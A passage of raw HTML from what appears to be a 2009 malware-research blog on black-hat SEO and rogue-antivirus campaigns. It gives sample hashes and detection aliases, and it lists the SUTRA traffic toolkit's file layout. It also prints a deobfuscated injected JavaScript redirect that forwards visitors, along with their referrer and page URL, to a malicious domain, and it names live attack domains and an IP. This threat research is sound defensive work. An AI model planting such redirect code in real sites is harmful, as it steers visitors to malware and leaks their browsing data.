(30.77%)</td><td> </td></tr><tr><td> </td><td>New info</td><td><a href="http://info.prevx.com/aboutprogramtext.asp?PX5=0F1F76FB00F83E21E6DF158F5C45B4008B59BC51">Prevx</a></td><td> </td></tr><tr><td> </td><td> </td><td> </td><td> </td></tr><tr><td> </td><td>Alias:</td><td><span style="color:#FF0000">Trojan.Win32.FakeXPA!IK</span></td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">FakeAlert</span></td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Trojan.Win32.FakeXPA</span></td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Trojan:Win32/FakePlus</span></td><td> </td></tr></table><br /><table width="370" border="0" cellspacing="0" cellpadding="0"><tr><td width="19"> </td><td width="92"><b>File info</b>:</td><td width="226">InternetExplorer.dll</td><td width="33"> </td></tr><tr><td> </td><td> </td><td> </td><td> </td></tr><tr><td> </td><td>File size</td><td>442368 bytes</td><td> </td></tr><tr><td> </td><td>MD5</td><td>8e428574cb9e4f680d1e28fe3ca673e8</td><td> </td></tr><tr><td> </td><td> </td><td> </td><td> </td></tr><tr><td></td><td colspan="2" bgcolor="#E8E8E8" style="height:2px"></td><td></td></tr><tr><td> </td><td> </td><td> </td><td> </td></tr><tr><td> </td><td><b>VirusTotal</b>:</td><td><a href="http://www.virustotal.com/analisis/33a9dac2323aeac19dc05b98e315344f" target="_blank">First Report</a></td><td> </td></tr><tr><td> </td><td><b>VirusTotal</b>:</td><td><a href="http://www.virustotal.com/analisis/3573bbf5777a8a912a6affb97fae9f74" target="_blank">Second Report</a></td><td> </td></tr><tr><td> </td><td> </td><td> </td><td> </td></tr><tr><td> </td><td>First received</td><td>03.24.2009 16:12:30 (CET)</td><td> </td></tr><tr><td> </td><td>Results</td><td>Result: 20/39 (51.29%)</td><td> </td></tr><tr><td> </td><td> </td><td> </td><td> </td></tr><tr><td> </td><td>Second time</td><td>03.30.2009 05:23:52 (CET)</td><td> </td></tr><tr><td> </td><td>Results</td><td>Result: 20/39 (51.29%)</td><td> </td></tr><tr><td> </td><td> </td><td> </td><td> </td></tr><tr><td> </td><td>Alias:</td><td><span style="color:#FF0000">Trojan.Win32.FraudPack.ify</span></td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Trojan.Win32.FakeAV.iy</span></td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Trojan.Win32.FakeXPA</span></td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Trojan:Win32/FakePlus</span></td><td> </td></tr></table><br /><br /></td></tr><tr><td height="25" colspan="2" valign="top" style="background:url(http://2.bp.blogspot.com/_9YOi_bjoDL4/ScMyEsYqlmI/AAAAAAAAAHY/aZXlFPDe0HU/s320/table_bg.gif) repeat-x;height:19x;padding:7px;"><b>Screenshot:</b></td></tr><tr><td height="200"> </td><td><a href="http://1.bp.blogspot.com/_9YOi_bjoDL4/SdAkR0ATqGI/AAAAAAAAARA/8r-vV_AETA8/s1600-h/AntivirusPlusSetup.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 248px;" src="http://1.bp.blogspot.com/_9YOi_bjoDL4/SdAkR0ATqGI/AAAAAAAAARA/8r-vV_AETA8/s320/AntivirusPlusSetup.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5318791048360863842" /></a> <br /> <br /><a href="http://3.bp.blogspot.com/_9YOi_bjoDL4/SdBDV3mtVjI/AAAAAAAAARI/uGY49iJYW0w/s1600-h/FakeWindowsSecurityCenter-AntivirusPlus.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 241px;" src="http://3.bp.blogspot.com/_9YOi_bjoDL4/SdBDV3mtVjI/AAAAAAAAARI/uGY49iJYW0w/s320/FakeWindowsSecurityCenter-AntivirusPlus.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5318825202907174450" /></a></td></tr></table></div><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-7584836-2");pageTracker._trackPageview();} catch(err) {}</script><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8434732598810973720-2537836824437927482?l=malware-web-threats.blogspot.com' alt='' /></div>Malware-Web-Threatsnoreply@blogger.comtag:blogger.com,1999:blog-8434732598810973720.post-88681037223381697742009-03-28T20:15:00.000-07:002009-03-28T20:17:36.878-07:00Black Hat SEO and Rogue Antivirus p.2<div style="font-size:10px; font-family:Tahoma, Geneva, sans-serif"><table width="560" height="833" border="0" cellpadding="0" cellspacing="0" style="font-size:12px"><tr><td width="572" height="833" valign="top"><p><span style="font-size:14px; font-weight:bold">The silent threat: Black Hat SEO and Rogue Antivirus</span><br /><br />The World Wide Web Consortium and Rogue AV<br /></p><table width="546" height="136" border="0" cellpadding="0" cellspacing="0"><tr><td width="546"><p> <u>Having your website hacked with IFRAME injected, trojans/backdoors?<br /><br />Having your pages infected with redirection to rogue antivirus/antispyware? <br /><br />
Having your pages replaced with World Wide Web Consortium article and some <br />obfuscated javascript code append to them?</u><br /><br />This page will show you some recent research about a malware campaign which has infected thousand of websites. In this campain all of these sites have been used to distribute fake antispyware called WinWebSec or FakeSpyGuard.(Sometimes called WinWebSecurity or SystemSecurity2009 with InternetAntivirusPro)<br /><br />Since July/August 2008 hundreds of thousands of pages on legitimate domains were exploited having web pages stuffed with keywords (porn, celebrities, popular snacks) uploaded to them as a means of attracting victims via search engine results. In some cases, the homepage of the compromised site is being modified, appending hidden links to the malicious web page.<br /> <br />All info concluded that the attack was made via stolen FTP password, on all these domains.<br /><br />An alarming observation also reveal that the activity grows at an exponential rate with malware/exploit code even more sofisticated.<br /><br />You can find some IPs, network, domain used, example of hacked pages/websites and other malicious code injected into these domain on the links below or on other page on this blog.<br /><br /><a href="http://malware-web-threats.blogspot.com/2009/03/web-poisoning-search-engine-ranking.html" title="The silent threat: Black Hat SEO and Rogue Antivirus">The silent threat: Black Hat SEO and Rogue AV - 1</a><br /><a href="http://malware-web-threats.blogspot.com/2009/03/black-hat-seo-and-rogue-antivirus.html" title="The silent threat: Black Hat SEO and Rogue Antivirus">The silent threat: Black Hat SEO and Rogue AV - 2</a><br /> <br /> *********************<br /> <br />
Screenshot below show tons of websites also used in this rogue av malware campaign but with some World Wide Web W3C pages uploaded with javascript code injected.<br /><br /><a href="http://4.bp.blogspot.com/_9YOi_bjoDL4/Sc5WT8yQwXI/AAAAAAAAAOY/aBSeRQo1zpA/s1600-h/W3C-hack.jpg"><img src="http://4.bp.blogspot.com/_9YOi_bjoDL4/Sc5WT8yQwXI/AAAAAAAAAOY/aBSeRQo1zpA/s320/W3C-hack.jpg" alt="" width="120" height="400" border="0"id="BLOGGER_PHOTO_ID_5318283110705578354" style="cursor:pointer; cursor:hand;width: 120px; height: 400px;" /></a><br /><br /> Source of on of these site.<br /><br /><a href="http://2.bp.blogspot.com/_9YOi_bjoDL4/Sc5YmemQ6qI/AAAAAAAAAOg/DgpxqgnEHtI/s1600-h/W3C-hack2.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 238px;" src="http://2.bp.blogspot.com/_9YOi_bjoDL4/Sc5YmemQ6qI/AAAAAAAAAOg/DgpxqgnEHtI/s320/W3C-hack2.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5318285628042963618" /></a><br /><br /><a href="http://3.bp.blogspot.com/_9YOi_bjoDL4/Sc5YmglY7oI/AAAAAAAAAOo/8LA_w-4zxb0/s1600-h/W3C-hack3.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 194px;" src="http://3.bp.blogspot.com/_9YOi_bjoDL4/Sc5YmglY7oI/AAAAAAAAAOo/8LA_w-4zxb0/s320/W3C-hack3.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5318285628576165506" /></a><a href="http://2.bp.blogspot.com/_9YOi_bjoDL4/Sc5YmemQ6qI/AAAAAAAAAOg/DgpxqgnEHtI/s1600-h/W3C-hack2.jpg"></a><br /><br />In a browser.<br /><br /><a href="http://4.bp.blogspot.com/_9YOi_bjoDL4/Sc5aalgRl4I/AAAAAAAAAOw/wmx7rbJyHvs/s1600-h/W3C-hack4.jpg"><img style="cursor:pointer; cursor:hand;width: 134px; height: 320px;" src="http://4.bp.blogspot.com/_9YOi_bjoDL4/Sc5aalgRl4I/AAAAAAAAAOw/wmx7rbJyHvs/s320/W3C-hack4.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5318287622761715586" /></a><br /><br /> Deobfuscation results:<br /><br />window.location = encodeURI(<br />"http://www.onlinedetect.com/in.cgi?7&tsk=aug-task13-r86-id67-t116-hst-16&type=l&seoref=" + <br />encodeURIComponent(document.referrer) + "&parameter=$keyword&se=$se&ur=1&HTTP_REFERER=" + <br />encodeURIComponent(document.URL) + "&default_keyword=XXX");<br /><br />-----------------------<br /><br />The source code also reveal thousand of hacked websites.The analysis of the javascript code redirect to onlinedetect.com or some domain used in this attack. <br />You can find information on <a href="http://malware-web-threats.blogspot.com/2009/03/web-poisoning-search-engine-ranking.html">this page</a>. <br /><br /></p></td></tr></table></td></tr></table></div><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-7584836-2");pageTracker._trackPageview();} catch(err) {}</script><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8434732598810973720-8868103722338169774?l=malware-web-threats.blogspot.com' alt='' /></div>Malware-Web-Threatsnoreply@blogger.comtag:blogger.com,1999:blog-8434732598810973720.post-24808446418048578472009-03-28T20:11:00.000-07:002009-03-28T20:14:29.361-07:00Black Hat SEO - PDF Malware campaign<div style="font-size:10px; font-family:Tahoma, Geneva, sans-serif"><table width="567" height="833" border="0" cellpadding="0" cellspacing="0" style="font-size:12px"><tr><td width="567" height="833" valign="top"><p><span style="font-size:14px; font-weight:bold">The silent threat: Black Hat SEO - PDF Malware campaign</span><br /></p><br /><table width="528" height="136" border="0" cellpadding="0" cellspacing="0"><tr><td width="528"><p>Previously in March, Abode has released some security updates addressed to <br />vulnerabilities and exploits using Adobe Reader. Some links can be found below<br /><br />McAfee Avert Labs: <a href="http://www.avertlabs.com/research/blog/index.php/2009/02/19/new-backdoor-attacks-using-pdf-documents/" target="_blank">New Backdoor Attacks using PDF Documents</a><br />Trend Micro Malware Blog: <a href="http://blog.trendmicro.com/portable-document-format-or-portable-malware-format/" target="_blank">Portable Document Format or Portable Malware Format?</a><br />SANS Internet Storm Center: <a href="http://isc.sans.org/diary.html?storyid=5902" target="_blank">Adobe/Acrobat 0-day in the wild?</a> <br /><br />Adobe Security Bulletin: <a href="http://www.adobe.com/support/security/advisories/apsa09-01.html" target="_blank">Buffer overflow issue</a><br /><br />Here is a complete example with sreenshots, data and analysis of a website <br />used in the PDF malware campaign and hosting a malicious application called SUTRA.<br /><br />The application also known as "Traffic Management System" is explained by <br />McAfee AvertLabs on this page: <a href="http://www.avertlabs.com/research/blog/index.php/2009/01/05/inside-the-malicious-traffic-business/" target="_blank">Inside the malicious traffic</a><br /><br />This cybercrime toolkit is actively used to manage traffic from compromised <br />websites and redirects visitors to exploits code or other malicious URLs with <br />fake codecs, rogue antispyware application, keyloggers, bankers trojan and many more. <br /><br />We have another example of a compromised website explained <a href="http://www.finjan.com/MCRCblog.aspx?EntryId=2189" target="_blank">here</a>. <br />Screenshot of SUTRA can be found.<br /><br />***<br /><br />Now let's take a look of another website used.<br /><br />The site is "salevisitor.net" 89.107.104.10 <br />[Do not enter this site unless you know what you are doing]<br /><br />The payload is located here
"salevisitor.net/in.cgi?6" [Unstable - file not found at this time]<br /><br />Just for your information, this is the structure of files/folders for SUTRA Traffic Manager
<br /></p><table width="426" height="891" border="0" cellpadding="0" cellspacing="0" ><tr><td width="156" height="13" valign="top" style="padding-left:10px; color: #333; font-size:12px;">drwxr-xr-x (755)</td> <td height="13" width="270" valign="top" style="padding-left:10px; color: #333; font-size:12px;">admin</td></tr><tr><td height="14" valign="top" style="padding-left:10px; color: #333; font-size:12px;">drwxrwxrwx (777)</td> <td height="14" valign="top" style="padding-left:10px; color: #333; font-size:12px;">data</td></tr><tr><td height="14" valign="top" style="padding-left:10px; color: #333; font-size:12px;">drwxr-xr-x (755)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">files</td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">drwxr-xr-x (755)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">html</td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">drwxr-xr-x (755)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">install</td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">drwxrwxrwx (777)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">memory</td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">drwxrwxrwx (777)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">stats</td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">drwxrwxrwx (777)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">admin/tmp</td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">drwxrwxrwx (777)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">admin/tmp.web</td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;"> </td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;"> </td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">-rwxr-xr-x (755)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">getos.cgi</td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">-rwxr-xr-x (755)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">in.cgi</td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">index.html</td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;"> </td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;"> </td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">admin:</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;"> </td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">-rwxr-xr-x (755)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">c.cgi</td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">-rwxr-xr-x (755)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">center.cgi</td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">-rwxr-xr-x (755)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">cron</td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">-rwxr-xr-x (755)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">cron.sh</td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">index.html</td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">panel.html</td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">drwxrwxrwx (777)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">tmp</td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">drwxrwxrwx (777)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">tmp.web</td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">-rwxr-xr-x (755)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">ub_fetcher</td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;"> </td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;"> </td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">data:</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;"> </td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">admin_forces.html</td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">connection_type.html</td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">connection_type_new.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">crontab_wizard.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">edit_force_data.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">edit_force.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">edit.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">edit_user.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">force_data.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">force.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">forces.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">forces_view.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">general_stat.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">GeoIP.dat</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">geoip.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">global_options.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">global_vars.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">import.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">index.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">key</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">login.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">lstats_export.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">lstats.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">main.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">navigation.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">page.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">pages_navigation.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">profile.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">pstats_export.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">pstats.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">pstats_index.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">register_done.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">register.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">search.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">show_bottom.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">show_data.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">show_header.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">stat_daily.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">static_stat.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">stat_main.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">stats.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">uptime_main.html</td></tr><tr><td valign="top" height="10" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">users.html</td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;"> </td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;"> </td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">files:</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;"> </td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">cgi.pm</td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">counter.gif</td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">-rwxr-xr-x (755)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">curl</td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">-rwxr-xr-x (755)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">default.cgi</td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">-rwxr-xr-x (755)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">gotourl.cgi</td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;"> </td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;"> </td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">html:</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;"> </td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">image files and javascript (gif, js)</td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;"> </td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;"> </td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">install:</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;"> </td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">drwxr-xr-x (755)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">freebsd4 // in.cgi</td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">drwxr-xr-x (755)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">freebsd5 // in.cgi</td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">drwxr-xr-x (755)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">freebsd6 // in.cgi</td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">drwxr-xr-x (755)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">linux // in.cgi</td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;"> </td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;"> </td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">stats:</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;"> </td></tr><tr><td height="10" valign="top" style="padding-left:10px; color: #333; font-size:12px;">-rw-r--r-- (644)</td> <td valign="top" style="padding-left:10px; color: #333; font-size:12px;">index.html</td></tr></table><p>The admin page has no password on this server so you can enter and see stats like:<br /><br /><a href="http://2.bp.blogspot.com/_9YOi_bjoDL4/Sc4UfpCLjZI/AAAAAAAAANw/NleqA-SH7TE/s1600-h/inside-the-malicious-traffic1.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 252px;" src="http://2.bp.blogspot.com/_9YOi_bjoDL4/Sc4UfpCLjZI/AAAAAAAAANw/NleqA-SH7TE/s320/inside-the-malicious-traffic1.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5318210743794634130" /></a><br /> <a href="http://4.bp.blogspot.com/_9YOi_bjoDL4/Sc4Uejs52RI/AAAAAAAAANo/olEasvGSuIo/s1600-h/inside-the-malicious-traffic.jpg"><img style="cursor:pointer; cursor:hand;width: 198px; height: 320px;" src="http://4.bp.blogspot.com/_9YOi_bjoDL4/Sc4Uejs52RI/AAAAAAAAANo/olEasvGSuIo/s320/inside-the-malicious-traffic.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5318210725183346962" /></a><br /><br />So now we know the IP, domain name, URLs used after redirection <br />but from were is coming the traffic? <br /><br />Let's take a look of another folder "/memory/"<br /><br />This folder has files like 1.access.log, 2.access.log, 5.access.log, <br />25.access.log, 70.access.log etc... <br /><br />Some related topics on this blog refer to onlinedetect.com, 0day33hours.com for another malware campaign... Similars files can be found using google. <a href="http://www.google.com/search?q=site:onlinedetect.com&hl=en&lr=&as_qdr=all&num=100&filter=0" target="_blank">here</a> and <a href="http://www.google.com/search?q=site:0day33hours.com&hl=en&lr=&as_qdr=all&num=100&filter=0" target="_blank">here</a><br /><br />2.access.log - The file contain the IP of visitors reaching infected <br />websites, some are in Czech Republic, Israel, Russia, Turkey etc. <br />The file also reveal the URL of some compromised websites <br />were the malicious obfuscated javascript code has been inserted. <br /></p><table width="324" height="149" border="1" 